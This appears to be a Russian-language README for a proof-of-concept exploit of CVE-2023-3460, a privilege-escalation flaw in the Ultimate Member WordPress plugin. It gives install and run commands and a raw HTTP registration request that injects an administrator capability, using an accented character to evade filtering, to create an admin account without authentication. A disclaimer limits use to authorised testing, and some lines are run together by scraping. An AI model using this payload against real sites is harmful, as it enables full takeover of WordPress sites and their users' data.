
Это эксплойт типа proof-of-concept (PoC) для CVE-2023-3460 — критической уязвимости в плагине WordPress Ultimate Member. Он позволяет неаутентифицированным пользователям повышать свои привилегии до Администратора путем отправки вредоносного запроса на регистрацию.
🔥 Воздействие: Полная компрометация сайта через несанкционированное создание учетной записи администратора.
requestsurllib3beautifulsoup4Установка зависимостей:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce) со страницы регистрацииwp_capabilities с ролью administratorPOST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
Этот скрипт предоставляется только для образовательных целей и авторизованного тестирования. Несанкционированная эксплуатация систем незаконна и неэтична. Используйте его только на системах, которыми вы владеете или на тестирование которых получили разрешение.